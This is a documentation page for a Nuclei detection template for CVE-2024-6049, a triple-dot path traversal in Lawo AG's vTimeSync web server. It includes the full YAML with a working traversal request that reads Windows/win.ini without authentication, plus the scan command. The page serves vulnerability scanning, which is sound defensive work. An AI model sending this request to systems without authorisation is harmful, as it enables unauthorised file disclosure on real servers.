Skip to content
Nuclei Templates

Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal

ID: CVE-2024-6049

Severity: high

Author: s4e-io

Tags: cve,cve2024,lawo,vtimesync,lfi

Description

Section titled “Description”

The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a ”…” (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6049


info:
  name: Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal
  author: s4e-io
  severity: high
  description: |
    The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt.
  reference:
    - https://lawo.com/lawo-downloads/
    - https://r.sec-consult.com/lawo
    - https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html
    - https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/
    - https://nvd.nist.gov/vuln/detail/cve-2024-6049
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6049
    cwe-id: CWE-32
    epss-score: 0.00043
    epss-percentile: 0.09833
  metadata:
    max-request: 2
  tags: cve,cve2024,lawo,vtimesync,lfi


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}


    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "vTimeSync"
          - "Lawo"
        internal: true
        case-insensitive: true


  - raw:
      - |
        GET /.../.../.../.../.../.../.../.../.../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "bit app support", "fonts", "extensions")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220704931db9eb364485e8838c007c3b3f02f8de213817928ba1d1a95ee43282cf8022100b5886dc7155b23a88b05e74076328be5eb4b519373d20fde68ab26c6bf1ae463:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6049.yaml"

View on Github